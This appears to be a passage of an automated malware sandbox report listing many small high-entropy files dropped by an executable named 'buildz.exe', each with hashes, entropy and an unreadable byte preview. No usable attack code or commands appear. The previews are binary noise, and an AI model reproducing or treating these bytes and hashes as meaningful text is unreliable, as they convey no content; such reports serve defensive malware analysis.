..i.......}.{.9Dm...a.=.)s..M.q.0..l.?.j.py....fA............Gp.x&TP@.DX....&.....x..35....adE....S...0.bV.1d.....C..$.m?.l_>.}.M]|.{se.g...\.(V..CMe.3.c...Ri.{T).C'...T..>.....5.*...M.....G....?i...h7pH..a.......H...h.Sh...rw...o5.3.....a......&..f.a..&l.....g.........~.B.....\>.~Kr.J.4...s.H..@E.Zb...."s......?.w5...,x..g]..m].u4.[......7&...c.kjm#.nHQ....D.xV...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1726
                        Entropy (8bit):7.8880262851741865
                        Encrypted:false
                        SSDEEP:24:+JJg4z5d/HN/4IM0Lc8qM8pk8J9piq3V/+6coc39t4/bxxon7bxgKlXWYtBlgCwr:21pyLPpk8Jmq3V/zLi9EKniKZnHpNUD
                        MD5:EFC9FDE6B1501EFE783C24C2DCE67FAF
                        SHA1:ECC1AF1D4737A76863C9DA0FFCE36537878AE52C
                        SHA-256:511BD20EE52C71AA493EC6C068DEC3D2C9E2E7BCFDC6B4605B0633EAB62F69D9
                        SHA-512:BC04BEB0A170D0D385928E477BF8570E750782A89B1BF26B58FCEC87EBE050E4DE52606AEA95994E2721D9AFE17752717D77DF2B6B46FADC50994D51EB82759B
                        Malicious:false
                        Preview:<?xml.nN. A..k.....{YC.D..]..`.~._TgE.vK3|..X.o.-...D.m..h.&...{.F.}oR..l.m5.b...r?(...<....<L.4....z.....^l..f.....C6....}#...O;..$.J..G.).....x.`.&.^.G.,C....Q.....I.OW..2GG.NO..4?..`....a...n.R..r.\....../QY.(1..A..7..n.......C>H..?A.h.).....X.*..1.}.}.v...f9i'.l...4o...p...7..,Z.@......~l.{.e.......vB.(?K.a.......1.&...E....[(..9..^.!.@1..!.D|......w:.RG.......}....U...?D^.....1..t....Pj....$.r.U=..?[.....:@.:O.[.=.JD...s.`.0...C.C.."...&..&Q[.K..7D.........F..j.{..0U..w?{.@...1..RW.RF7:t....$......N9....kOK........_......a.....l.3.v.3.D...j.cXD<+...'L..U?A...+T...{....u.O......?.z.F..!._!......clb.My..%'1....q..}+..Q...b....n..$...~...Os.....S..cX.._....O.T$..1w6..3....Lf.GRh...wb...n..}q..p...........@.<"<....b.S.......H.J...y.Ps'..=&..!.`.o.Q.)}.:_M..j.."3U...J1.w.5)...).6.E......"jY....Y.'..u..6.h"U....b..*'I\q..9+...`.X.....K.....7...%F...u....&(...S.#Y=.J.QtD...(*....m.f...<k...................u-..Ps..`Y..*...*.5].......`
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1691
                        Entropy (8bit):7.867286124749877
                        Encrypted:false
                        SSDEEP:48:gD3t3Vdsc+26ncGMPMb9zjC1fzpHJJIVXUD:G3t3nPqc3Pa9z+BlJaXA
                        MD5:1981D8A64DDA25A664F01ED64AF2856B
                        SHA1:FB32313F6C07A3DDA8ADF8A10ED772FB0DADF235
                        SHA-256:5B9A509AC9056C8F640E78EC295C5A2A29235E65B6EEFD44BEB83B552EA01203
                        SHA-512:3E197B890747157956843A070C9163186336135E2C1B5C4FB83CBEA9D67D6060404FB81BD58ABAE6DAD58E76E1636766E6655E88E56275133983E20E5CEE2546
                        Malicious:false
                        Preview:<?xml.fm..i....B'....b$.Y.!..K5=j.`......m...B'..q!.5...Te.....;.1..C.s.%S..O.j..p.....p'`.t.m..W..k..F.H`.<.....IG.....E`.....$.D....:|...n".'..9.;...0.$g.T.2..ij.;~v.6..KA..0....9...B|:.T.k&.}.Z......V......S~(c-.k.....4..-...7.....LS..s...........l.wo.....B..D.q....Y<.>.#jo.c....*..WR.E.@n.:].."....:.UQK5:.m.............o....'.j....g?...0.i....Nz.........{..{pp5dx.@....0...0z........aj#..U.........~X.x%...O ;G..t..1|...q..u..8..4...........S_.6S.)p..P.o...>....,.....b.@i.n.Z....g..Le..n.Xw.B_q.y.P.^.F\1m..?..1Q.. .4..X...i..i....*..R*e.S.G....4.L=.m..x....ik.t.;x.'.4........A...A.o.i.~l..K..t...EbR...mQ.H<..B]...m..#..m../f..<.3.y..[Y<...'V.Ye...(..._u...?rF8.\..tz6..|......).....]..}.....&%x..5.8...}.+.g>E.......*#..c=...TO.-.Ak..]..N..%.?k.".$m....~^..}J.zDV.b.....-.....|.S..Q..}|Z.)9...]>....^d.fE.uU..0..[.p.?N...;o.cJ.4.x.xu....H9.~.*j.klT...8.3...i.Gi...Aptc..V....p'X.n|y.GH..zD.D.13...u..J...2F.H}U.....j....S..c.p.I.9CY..}l\..9.x=..V
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1728
                        Entropy (8bit):7.882421021529685
                        Encrypted:false
                        SSDEEP:48:Q1Rru/4HOgLD8HsM9ufv4+QdnmT6xmzfKuQ1UoUD:Q10i/rv41mzfNQ1UoA
                        MD5:3C255754A0ADDAD918570A3090AFD53C
                        SHA1:0D51CFA29651AE391BFCBF48F3D084CD35E43EDB
                        SHA-256:02ADF22FACDF72C84F9C6DBAF8AEA64B4B4D226D5B597B54AC7D1BAE4B9F5FC2
                        SHA-512:B6F8F1019239B75FD305D38BE398F302EB3B85572F259894255F01ABBB288FBF72A632E141143504A98ADD394E480C50E307D96E4648066B3382AD61D5F94396
                        Malicious:false
                        Preview:<?xml.v.BH.u.. .[.@.........Pr..9".!.`..C,i..\.."....g.....e}.6...-...Qg...Z.....,./....=c.3.pk..Jn.J#.......R..;{....x...c.}~$...U.d..~....v.........c]..{q`..c4&*....3@............j].u*...p....-8!.......u.....q..9C...&N.Ig.m.D...uP....t(=!...=N+....$J....y..{...~.3.q#.3...9S.X....Q.]...FB...1....Y.:B.g.!.v.....f;".....O...%$f.eK.R.IB.`.W........c....S...7%....).8..y..vf...h..7...........<...3.P.k.(.....x.X.Y.n..F..r=.4...k}!.P.....6.G....f.g....?bxf..7B.\.....`.....(5(...g..p..M.......8...g.q.G..(....[m.0.u._4.o.o.<.j..2.Q.....5.......N....q.w.9....S.\..1......;;n..G.-..).7......_/1..V5`..M.......@i...^.?..5...la....S....!Ug...u.._=..(.J.7.E.y..6...!..........W....)M6.T#.w....6./.3q.....<.L|J.....D.IT.G~.X.]}s...9..yb......1..Z..$+....J.@..oP.Meuc...JI-v.N....<.o.X....&..|..t.o.p..R..X!n.....2...y..D..wz.G6....&........KM.....K..&.P..a+...ql..4..g...f.|@...&_...y...6>...c..>y>KO..Y.fb.5.....&t.s.5...k]..L^..b..v..,.CO.[......V.....-......2..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1699
                        Entropy (8bit):7.881560554696053
                        Encrypted:false
                        SSDEEP:48:dyrilCT4EKWVz5DtQgF3NgUJ5mbNIWoNNggzUD:dnZY5xQi3NDmBIW+ggzA
                        MD5:7008C955D71DD672897BAFC9C52F4EFA
                        SHA1:995EA62F831474A8D2171103695B62D9A589FB39
                        SHA-256:D3F7C4E263CACB0B68179CA5A8EC199E628535F421441EEACE806E6D8F3ACDFA
                        SHA-512:7652A46931C3FE01F6DE7ACB065AF42134888A99A5C2DC1BD126CB41D008ABC0A2A4D561DD06B0C30BCEC61264A66A08C5B3BFA4276C5CC178E50BFE20D44F0A
                        Malicious:false
                        Preview:<?xmlA.v5....A..h......q...N.z....O...h_....0..!....W.&....s.o..!p.t.!x/..svG......];.......c..`k.w...-w@65`...`q ...s4s...........Kx.2.Z...k...'1.].|MH....g..,..`...7k...[...OqGn.K.K....n.Y.m.P.p7z2S....4.:.....Q..jy..I.N6......=9#8.>..q...^.V.&.C..........j...H-.AC..L.._O......%....h.;.dPde...).4..[.-...|.&_l.=.e..\..u..H.d.8."....~dbd98W........@.[.....M.E..p.B.}n.uZ...+7....D..uS...a.D..W.gD...q....c...$.A.i.H$."....e.).C5....p..............)Vk!..N.*j.......w..Sm..C.X?.|.iN{...:?.......z.......B#.D...5K.n&n...y.F...k...U.I.$). .};....a.]"O.=.!.C7^.7...\.....Q..*..3..-.S..2..s.9.....k..^...F....Rt...o...5op.gO...c.H..p......,...\b4.c.b.*.}t...MI.....#A..I*.>.4t#.X..._...s".E$u....e~.]V..YA;.L...i.).P+b.@5c.&0..t6.....\Yel..`.{..ufS|E....r.7.....F..D6s,.....B.z.s*..... SU....7.f...uZ.....@.t.R.......XtM./P..p.....|......hz2......X...R..F..E0ar..I.$...&E..qv.....2UXk.5.S....#J.{GF......R..S........b...W+..E.p..,._U...(..5o.9Z..N.Q....)
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1736
                        Entropy (8bit):7.881168273906909
                        Encrypted:false
                        SSDEEP:24:FHlWs7x9P62E9rxo9uXjqVBaQ92hQIZDpGNL0qUCdtelobVvmlI0asWIrtm5ZmoJ:dvz6uBaQfI3wL00dteebVmI074Z9ivUD
                        MD5:3C877F57DEEAAF97A8CE9F3C0AAC23AE
                        SHA1:3284BF2E0E73CC0EA326AE963216D59FC43B077A
                        SHA-256:C5DFFFEA51776D1E9C77C028D59D5B20ADD1C1A063DDB0CD7D6713D0D3F569F2
                        SHA-512:8AC6CAAD2E5F62FB4960012DAB8E524E78F5846C212EE51285718DCE00CAA482B752D993A3EFBA832DCBF8A44AADF082C17D206CD32A6A2B37D8279945BDE8F8
                        Malicious:false
                        Preview:<?xml.2.K..-2.....|rJ.....r.Xx.n.' .../._.........RN$...H.6.. .1.'.#w.4~..!..3e..V.......(.&...)SE.b8Q....3...=.U.Jy.....A.h........d..@2.s.&..b?..k.\..)......6{.F....".Yt.s..@..]..n.Y0.......Oo..5.....w."..F.$...l..k=.[...N*.ti...qE.)6zo.....#..S... ......8.K..g.2].?.bg...........?.tDQ.D..l|...e2..T...1s92._.....{... ..M...Up%......Elr.8k..p..9#.w'Q.2......g.4....b.#km4..,%...5....L.t...J..N.d.:..pWA<...`Kr..=......]...!..#......6.0S..[.........._...{.9.s.....r^..%..7.."Hd,svk.{>.cT]n......<.d....BA.....<vi.*{...)t2.I..~.....:.`.H...1q9..t...&XAW..D .~.I.*.w@*.G...^k.wSIAo.....~.....l."..V.k....p......?9n...On.!....;..T......5.[/....3.o..w/..J.x|y..5.{.V.+. ...5.!... vZz..x...q.<....L*f....&F...........j.........*~Y....u......f...'f\...T>.U...5mH.......:%......."|..6.....K.>.r.......2...j...W..CN..Z...qU.o....%.........|..p5..J...,..X!G... ......i.<...O...x.Rri/...;...5.YY.f.zH1..2v.m..5.6...D.....zq#..".h.G....j[\.....'..<db.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1703
                        Entropy (8bit):7.892698568836887
                        Encrypted:false
                        SSDEEP:48:sQA8bPUMY6AJUaNfQSuhwmK/BtSQDNkQ4dI7yNNGSUD:5VQp1fQlhwmKzSQDmdI7yNESA
                        MD5:3DA8BECB5FA4074FA0DA713D745B5C7E
                        SHA1:E55966B7FEAF6007C5B8402ED6ABAFC4C1F01C30
                        SHA-256:2C26674CE93471C26A1EF9798E46C9F0A118813C2CD19B930A89249DC708EB1D
                        SHA-512:F6EFEA0BF049C4E0973F6898AA4F9DB6C3FFE9BB388AF36733AB2C4BFFF7730A06FD7FCBE09122B9F0C05FCE808C6D965D85DF2553922799379405AB6A012331
                        Malicious:false
                        Preview:<?xml......Cb.2...mt.O..RZ...h$....^z.y.>...[.+.0...<..m;9..)........@<.B..Q.}.Wh._E....rY.dQQP.....t.......qX*.11..dD....u..W[..@...\............W.1.7.<w..Ay5.R..>.D..Q..oV.|nO.'.._.&....X].#.B.}S.R}..*B..c........Qu.D!....N.Ht8.#4..V^Zq....~......#>..D..x$&..Q...G.*.m1..6..F4s./.Z\..[..#.,......K..=#._.$...K.....v.[.cB..b........C_vP.2 U.v2F\.FZu.X....[..R/.....I..75.\Jp...k....wr.*z........)..r.c'*...`W...H[.%.H.E=.E......_..q.1.....l.<$.Y.vDY#z..m..%...D.....ws.Aa.$]..k...Y9....H..O..|...a.L...........!..%.]5......0..~.....M5%.......uE....@..7y.....Z2L.0.u....[.W.,H.x......d...R......../$...Ww......$....D....IB*b."....Y.4u.>......yi.ce..{|b...~....Z..W..OW<........`.fm...8h.....K~.......{.8....E..9.1.e.>E..hbg.8:M.o.`n...n2....x.+G.S.k.'.-..S....M..$.)zw...._.."..^_G....4@u..).7.A.?.e..b.../.5.c.7...Q..:0..*L...b.J.'....B..i..7.WE.^z..C!...{..v.M6.J.L...=.H.../..Z........G.6p.0.......f....S...}.xBz...l...f.eW..K.K.u%7e..?.'..tV.j.6..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1740
                        Entropy (8bit):7.886392365910725
                        Encrypted:false
                        SSDEEP:24:9pFgycL0kUKLGU2Lk/eRpR5f/uao709Fc8zsr0ocX1cSU+j+4mjKYRFXt6NeuUYA:7F/cL1fGUA1Z5Hu5TXSjsKot6NeunUD
                        MD5:BEDB94FE9E33DA0FD2A5D514997DCF50
                        SHA1:76EEF658EFD1E5B889B4607C05497FADDE351ED8
                        SHA-256:5C804C556E398B11E824B883082418C1C63ED95EF463DF2F1AF1041D9F567C10
                        SHA-512:EA97E25D173314F6CB05AB404733BC41DB087D8B9FB07A1079B9E26296E35D57962A867DB9CE43C30E27495B80DB968115891AADCCA9113274990F077A9817F0
                        Malicious:false
                        Preview:<?xmlwM/....)..........Cc..e..s..t...d._.?e.i..Z..x..cO.J/.u..j"-'...!.Z.....m~...i...E^..~.2.].....Vi-.,. .Yl......~!......%./.lJ....'*...v.......y...2..Md...wmsY....J.....[{.m.a.T.[.'.Rl..R....9.KK.)..]..5z..p.n.{.t...X..o..y5e1g.g]"...5z{,........Z.(ct..%.7..v..,ca...u.......L.p..Ezm.....td.....`0..../.vg../w{y.G....3...r......9.....l.....>..`.....Oy.=._k.}2;J.l.*.&T...l....7Z.]Y.Q..k]...*.*S..W.....m....k....U|..6.i.~..../.MPJ......0.... i..j....&...tK...]....{$...C.L<&9Y..=..!u:...`b9.......([..8f.~.....Q.4.%.\]$.._...n.8...B7.V...X.........$........8..m.T..Ae.Eb}-..T..[...0..;..P.Xl2.).i.^]....?...D.p...f...!...=,...i..3u.........V..1U..h..|K.w....^<......lG7*.W..Y....E..}".%....$}..#..o..N...0.J..l.O?i..? ......W!.......58d.F.;.v].....w....Y......>..~l.F..-IE...LV0&.0.$.a..P%.W.....#U....+SP01^..J.S..h....P..,.I]E/TG}.....w]....^U.5{4,..d....p*_.{ .)..im.`.E.|..ia..QT.b8..iq..X...[7....&.E..t...f.&.%.-).T.....wh....JmV...%.T ..`.Y....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1697
                        Entropy (8bit):7.873886512895737
                        Encrypted:false
                        SSDEEP:48:2Lvl3Zm+irEQotXUiRbDH7NcOjmb/6Mz+wwYEj1JvSiv5qUD:2zpZSotEiRbDuOSbCMNAJR5qA
                        MD5:937E74F43DBE22D9FD6F733F2B2B9DE9
                        SHA1:6F77ECD0C2F5298E1D12334D872B957A9A11D3A0
                        SHA-256:20FB3476B61001D1CCC3A993BF74C070A8361C16D0E2F46E05D487DD2DA258C9
                        SHA-512:3A6AF692C1C3EC7E9EAADA9FF9EA362535B62C3353BADA8F2C93751B4C4F9DF5CF39A47F983CE8154E9F3847C5C4C17C8F44A9717026CF91F22B0ACC9B8E80FB
                        Malicious:false
                        Preview:<?xml.......Q0 .CX.c.v..W.l..&..).r..4...(~A.vw.a../... )..q-u..r9%n..;..2...5.9..fT..L8...).w.T.....!eg.......d..0.nZ....b...r..gz.n.'.wG..E_....i~.Iz3....b|kh.......9...6..........RK..\<.V~,Z...(.....J..6F'..A..j..t#....2.b%B.?.N."..az.*%S.9.P..,.......8.K.(r ...8/.g......-uU...Ze.H......:5..e...@.8!a.Q...B..x.pp...|z.\......-..<.b.'....i..09..L..[.P(|..h4...p.^.~......1.6.AZ..mUk|N..?=C6..*.$p...r>.wW.>....!.07)..j...+.oEo2....=...2..P..u..R.0..0z.q.9h...<.......Pb.=K.`...^.1..x.~.o.vo...........yQ.3.p.g...w-..,.M.=i#.3*.._......%?R...u..D...&O._.=......U...............Z.F. vn...=..}..2.N.G:.g..?..C`..@=..\)...dsIW..4<.z.>...q......$...e.u...N..p.......$n(....~]._*.*.}..........2..w..`..6'.a.#G ;..y.....k.Q.\k.._s1A...hPWi.u..l._..*...iAr...g..%.6E..sSPv..g.H.i.0...c..2.]..I6..a.sN.v...R2`......)......t..*..[|.....?7..y6.#....{a...._..v.[.2I.BR.-.h1Q}./..'.j.p3..J..f>...Q.Pw..g..zDB.t..CkB}iy.}].. ...4[.....b...D...u...g.Wh.*
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1734
                        Entropy (8bit):7.8753771751541874
                        Encrypted:false
                        SSDEEP:48:PIOIV0MMdsdt1bcYPhYiIfBjAc5pwJHuHHUD:PIzVSQfYYZXEzUJOHHA
                        MD5:439D9E6556D9DA92940F41BDB4B9856E
                        SHA1:F897ABA956BFBE35C5DBADB9E7813AD581BA885F
                        SHA-256:9E5DD3F73025075A6945EBA162B22B0688F785F23E3AFD04A22ACAE42616A3FF
                        SHA-512:3D1FFE2D9648D9A36CA66291FFD1FF55CD1A788CB3415E483D37B0EC00867BC046C60491C7DEF2C09555F023C7E7297CF239A931ACFD96350CCCCC7C1FF062DF
                        Malicious:false
                        Preview:<?xml\/.* .I......C....YT".6P,]<..a.m....'.k.O&....Hb..Yp..~..)m.(.m$.....t.VV}Z..c.|..21....E...Y.9....q..0E..".....".:........K.k..n.@qxXT<IQ...{..CQ....0%.IQ..<.(5....u@..5.S.[..V);.\.L. O8.x9.......<tet.h.....y._...M..]E........u.0or.[.....Vc.o..@X.........o6.9Ev...].uU>#6...4.Lw06m...DbJ.....-.?.....7|He.`~..y.H.......D.y.oQ...].$.i..u.A.B)3...w`.+y.nxA.^(b..l./..X.y.6.....y .R6.P.Y-..`..1....5^....f........:....]|....t.Sb~..#..@...(..3Z<.+........:...@.3C..V..E..'....kR.vP.I..*.....^.M.t+.I...k.e..Y.w...Z...O.kf..C.u@%......h.gm'..$|..._.-..j@..C..EE.B..P...(..#f..dV...2/.1.Ry.z%. .A.K....)...2..c....qm..X..-.v..w.'.....V..."g./.......v9.8.s...0..c.G.nX%V...G...r.y5]M.XZl."$!Q......K.......nr.q.:.\>[.1......G!xhS_....3.....L....OL.]tEX}.S....V..........9...dm0..J...N......~r...,.U(...PQ.6....n..:.:m=...../...."./....o..U....A.....(&/I.......L.....JF..8.d$...He...:..Q.."...t.t.....9l.....Q.....3..._.(P.*.?..e.;"a4...S...lh. .Kc.Un-.k
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1697
                        Entropy (8bit):7.878726387343015
                        Encrypted:false
                        SSDEEP:48:w+SjEOzZ2LvSot5CRPLoEVV+utiAQxylUD:4EOzJot8p0EV0AQxwA
                        MD5:CE81BE84CAF49B8E1BA378375C6057C5
                        SHA1:DA6E319E97D9AE6FCE52470C4CA0F3EB0BD78C42
                        SHA-256:0077F5BAF4B8A848F3FBD913E5680354C7BD4063A691BCD6EE0F8A5BCED031CE
                        SHA-512:819D29FA4638124DD5396CFAF421333AEE071FC5E2DE055D2F44073A2919E86FEB4BB0912F9EA1DCA3FEDB5395239097ABA0E47033EE68A4AD7C079F30F6B654
                        Malicious:false
                        Preview:<?xml.........y..Vdh]..G...?.Hu.. .OSO.,.|....=..7.mj...!......pG....mL.l...<H.a.A..D1.6..+...[..T.V......';Q...c...=7.w.:..h}.....@JC5.H\..Ov..[.....r....)ZR....'.v...@...:c.....U..f....z.&.]..Th.M.Y.....q.%...[.]..e=c.#..X<......q...:ZvS......?x2oO1.Eh.5...g.Q'..].j.i...r.......R......2.'.m....&bk...dK/%.I.[...F%.....6...u-..74..l... A.%....Se.8h@...B.....U.(.......J.CE..)...+=.......Q.w..l.D.^...-...^.....>.<.Ol..a.n...9u..i.]..'8O..86..O..,.?L..Q....,_.OY^.h.q.7...J<m.,@i..{..4.5.T..%@.+....y>on.($6.yb^...L..Q..z.4....[..5)..+-G..hg...A2|.T..nRg` ..t.u.........~.'...../....Iy3.L....2......Y=......5..;..wZ(.Rv2{.L..n......p.G.2.\......~.S.)!..{.....V..Z\..z......$.YT..??.....m.o.N<....[.V.V..E.a.~.x...8.t7..M.,/\;.y...n...&Y+#E..j.....+p. .G...vBJ.Q_.Q..~........I......-...Gl..+..s.v-.&.... ..4.V....a.rS.1..........,.]..... -].\..D_...v]f.9.....mJ.z,}*.......F+./4..b.z.4.$R9".G.e.C..oo................qm.k..F....qR.A...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1734
                        Entropy (8bit):7.889825069190405
                        Encrypted:false
                        SSDEEP:48:1Yxd9HyDTX112nd4y30XVRr9ECJr/C16kglHUD:65HyHXedZ0FRr9hlq16kKHA
                        MD5:28478F222D04A02172376F70D0EC429E
                        SHA1:02FC06BC432BD4C171086ED4DBD7400AFCE3CA2C
                        SHA-256:02E2CDBF6D9AFB8030701E50BE552F764F6A17A50229C7527F7A8F797886C064
                        SHA-512:FCDFE14D9342260CB8C8585005CAA8F19F53CB5876B78BDA6CAAE5EEFC18C607300BAC6BF0C900F22A25D797C2FFF756EA2CC390BAFEF2F28749EBBF5A969022
                        Malicious:false
                        Preview:<?xml..a..[U*.xR.*# ..S<9X..q5..[n....../..\...&..4q......Dr.Q..n.z.*..d.2^Y....5..?!/.FikC......O......@G....d.J.>....4.b....O....K.....<[....Z..`(; S3....2(7..&...f...2.p./....S1:.jq....<.(.b. ..8..t.nq9...A)..]^..`W]..8.....x..5O~...[.j....j.&.....q.kn..k..].....0....8....O..: r..*es..0!.P...9?.`K..+..3.O.V.O..K}...$.3.Mq..S...e...../..'5.L8..+.9.*q.s.bW#..,XA.-6q...a..KYN~...M..H..a=..o\il.$'...o...!.SY.9u.0A.yo6...r.Y.c$x.V2....[............$.<<..i..l....|0.-W......H.O..+..eu..&..n.o..e.v....O.E7.5...YF_.1..C.u./f-... b,..|...#Q....5yWH.m1v..9.M..q.m..r...EW.I....]....`.k..g.....o...j..U..H....T.I...E.b9.{.c....&.i.....|E_.ly.\...K.b.B...A....u..q..L7...ET.5..c.N.4N>..H.(\.......&.~.....g...I.nZ..9.<..u.fnl..v.....ou...W'5...\CJ. +.!.x-..-.....v..kl....o.3....!.+.4|..>..q......{.o.d....h..[.w.n.A.b.P...N.g.z,^%.(.Rn..[.`s?*+l........D<.L)X..h.......T."..:.....)1I.].$~:.+.v>.%.[T..F.#1$......N.U.:N....f.P.AA....i.r..|.Lv....tH.U.J.W."
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1701
                        Entropy (8bit):7.889409944146213
                        Encrypted:false
                        SSDEEP:48:kJAyByucVX3arMoHGdPBBpmjiTa9i2zfOsSe4k8d6dQdDUD:byBViq2f+iTyHWJe4kADA
                        MD5:795F04D9A45F5E460E11A34A6DC4B44B
                        SHA1:6CCB5222602E60C6472322230E9D8F85B265C606
                        SHA-256:BE0619B39465327C6331D54C7006AB44690E282D3D30A7FCE27EB7F7EFAB982D
                        SHA-512:5A6670129677F4FD49E228E34932694E37CDBC30C7F3A7FE28165565332D9717F55B8F099A8820996C1A54A48FDF952C98FBDE39844574E6CE5721905518EA75
                        Malicious:false
                        Preview:<?xml.?..c;_..e+r.O.4V...#..".{0... ..K.W>.z...>%..F5h....T...=r.x.#...RS.j..&9KN.~=.I.) I....r...Dg.=.Y... +-xC.w^.{....\..*....2S...,..fm......[.....E.q....*.....W}E.).Z..uG.d.~..>.'W.......b-*.jO.*....^G..vS!..<....OP.\.Z....7...._.....$gm.6.b..M..xQ.q..|.P.r.b.ayH.S./.XR..`Y].a.i]..._..n........%....Y..`..A...t.n.A.....>..o.wV&.O=...7.$.F.w.b..d...+..SFo7P.gtvw..s.....0C....Bf.m....(.....|%....?...w.8N+..+.\..x...".k..v.,O.....GL-.,.<.^,I...z....r....].{.(p`1o b..c}T.\yk....y+...).R...L...wV@3|...lu<.t%...aM.@:.3..;.i..|.Sd_P...}...A...8.S....\<;.N...#......m@.J"...U....u..R.X.:..L....u.h*NJ..r.uA...>..0.U....7..d_F@\[...[..#P.(K-..?.4j...{1.L./.i..p..+.<A.....:.*.........UM...h..~.:....'.....k.2......Z.~g.N......3.W_SB..S.=...@...U.}.u......Z.E<{X9BI.6JC.......uV.p....7..............u...l...5.?&.tGBS.....\~I....h.MN?y...p!....m.\.?.SQ/...b.vq$.'....VQ..i.........r.4&J....$..W.$...y..>..u...Z...C...#...Ni.?.X._.TJ`.S.8<UO...7.x....8.....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1738
                        Entropy (8bit):7.86267945167972
                        Encrypted:false
                        SSDEEP:48:kK0BwwwqJ0xMaPXXxQ0NcW7zBeExsO8jQY+EUD:kKrqeVxx2AeExk0uA
                        MD5:BEFCEA695B6F274BD1708B9A53DD4E4D
                        SHA1:98938ED67408F45099E535BE1ECAFF60CA4F4DE1
                        SHA-256:7936975E9E742AE1DEB8E210CAE54B1AE183E7CFB15FE3A0733B108131640718
                        SHA-512:76A31DEE0009CA0F32591B9A3445C7EDAF65AC5E51403C89AF46CD4B175C631EF8385B7397A88AD0CD0C6CE7AB756D9C896453D6583FAB434B49E9BC87B1FC21
                        Malicious:false
                        Preview:<?xml......jZ...v..fF5..=....gL......}.Y..../jB.y..&E...tT~r.>.5R...I.....;R...X..^.=..Ik...W9f.d..0..L.`...=E.4!.r.K.8dLm...%.d...R..C."....-.&...K........<.<v...m.u..+...x...A.eG.......D.....ILWP.k.}..>&V.\<....)@..,4...........u...S.M....y.H..y@...6.N...]y.6...c]L.x....!..../....`.c..c..*8..rVY.X..x.I.p........*~...]..-..4`.(.....g.9.X..6.eg.R...Y#.*..nm1....|..Z.. ...cv..X.....(6..e~|j;N..,.ZwI..P...0I.>.7.W....Y.H...4..;..R.p......{b.z5....T....{h..P.mX...az..^..8X4....<P^.^.u..T3......t..@..P3...n....V....H"V64.n.....F../+..0>.U..A..Xmj..A..hGI.$....ck.Y.S.......@?(?...P.w*O......d....ZQ..=l.......o..m.94.........fv..h..:.j..A...~.$..{.&..n..n4..P.....m....?]Y.r[.......4.D.L `.ci...d..v.t.5..4..U......".O.....U.b.N..@^..;.....;......q........?.....6W{.N.......;h.M.:..*.,.r1..{.HzH.......;..Su..5Df..1.).J..L.....I.B2.^>..M.n....N...%P.D...3.....Ka.{.e.B..N......u....I...?....7)....Qn...^..|...N..K!....._B.ZN.....7..d'$.J
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1705
                        Entropy (8bit):7.879166646713353
                        Encrypted:false
                        SSDEEP:48:2FG5WZzQcJDVFpRzV8OAbZ9RUu80Mq8X/uu7wxkyHUD:tWjDVFppBA/RUu5kf3yHA
                        MD5:31FF9F1AF6C96EF38998138D9CA24811
                        SHA1:8EEE41EE58728E330F8805A236A119247F3A20C5
                        SHA-256:FD69025D2529ED82724847303EF5D20CE2852F0E08AB484A68E5D559F162E720
                        SHA-512:9D7200F8C39BFB9BE6001A02E750F00A47E1F8208CBA5168AE8650BF9697382E663301546C23B5F59916D597246844ACC4324182526B7F044B6B2CDE3979943C
                        Malicious:false
                        Preview:<?xml.^[.|.....g..M.s.:.et7:7.....z...........]*.....|..0.c}.]..H"~~V..j..q.{..A..^r...PRt....xX|.oU..R..L\.ja...].?....|/.JYR......Qd=.)5.T....;.-..(.......C....&{|..v)P..RU.T..B.C.-_.N..!D...m..1.>.gt.EC..J......:O.@z....2...tH@.r...........P52v..w ...[...;/.~...h..M...hL.h.+...Z..}..a....&40..p".>.`.D3..Im...T.^..i...&_..N.9.....+p..V.I.O(...]C~....agM.F.fM./...{.0....V e&.Q.y.rA;.......".,C+....L.r-z..8u$.?#...7X.7....:..8;]....`L......($.Se9v..x'.....W+...9.....8.ER.\...FN.|..r.3!*!........E'...7..p/E.c..}..X.;W..i.q...e...c....OS.B.&...h....>p.?.L]....[+..9..I.j..0<..l(...4.0.Iu.o..>3.._../...B....|.H...M~..}.l9.>.[....DA...r.1v...\..\-.B...u.E..|A)i~.v......m.1G.....ZwB....*44...w.z....r.}yM.=.(FU..`..h.[\E.Dy..5Q.M...R......q..%.6H.]!B.QY.3..Xz...$...'...y/......._...]G........agH1..^u_........}...j_.e.....L.....U.(.N=.(.B.v.h.f.L...a....x...O*......T#....:s.h..LC..q~w.}.B.I"......a.O.....J....E.u.... ...HQ.b.W..kL.G.....n...J......
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1742
                        Entropy (8bit):7.88053512582783
                        Encrypted:false
                        SSDEEP:48:TuZe/SgLYkNlfzLwdm51+pMBm55d4MwYUD:6o/RckNN+m5JEhwYA
                        MD5:28724866C24A0DEFFCFC91EA3AEF4E87
                        SHA1:6D071D8D42CF7C92FFE91D8C99C392A358875EF1
                        SHA-256:7A457BD5292A36E345494014B588E3D1EA5DD81C120272B2CBF3018553050F4C
                        SHA-512:AB3DBC76D0FE2635D20C0F70CFBE3D36CABF63024A10C430D3FD21AF4AF6B1C6B7B07F2EE0B5FDC7AF94A68BAAB580BD791265437E834EB3D457296125E9374A
                        Malicious:false
